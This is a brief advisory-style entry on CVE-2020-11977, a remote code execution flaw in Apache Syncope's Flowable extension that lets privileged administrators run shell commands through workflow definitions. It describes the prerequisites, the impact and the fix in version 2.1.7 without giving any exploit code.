CVE-2020-11977

Vulnerability

CVE-2020-11977 is a remote code execution vulnerability in Apache Syncope versions 2.1.x prior to 2.1.7. The flaw exists when the Flowable extension is enabled, allowing an administrator who holds workflow entitlements to use Shell Service Tasks within workflow definitions. These tasks can be abused to execute arbitrary shell commands on the server [1][2].

Exploitation

An attacker must be an authenticated administrator with the necessary workflow entitlements to create or modify workflow definitions. The attack surface is the Flowable workflow engine, which does not sufficiently restrict the use of Shell Service Tasks. An administrator can craft a workflow that includes a malicious shell command, leading to execution on the Syncope server [1][2].

Impact

Successful exploitation grants the attacker the ability to read arbitrary files, write arbitrary files, and execute arbitrary code on the underlying operating system. This can lead to full compromise of the Syncope server, including data exfiltration, privilege escalation, and lateral movement within the network [2].

Mitigation

The vulnerability is fixed in Apache Syncope version 2.1.7. Users are advised to upgrade to this version or later. No workarounds are provided; upgrading is the recommended course of action [1][2].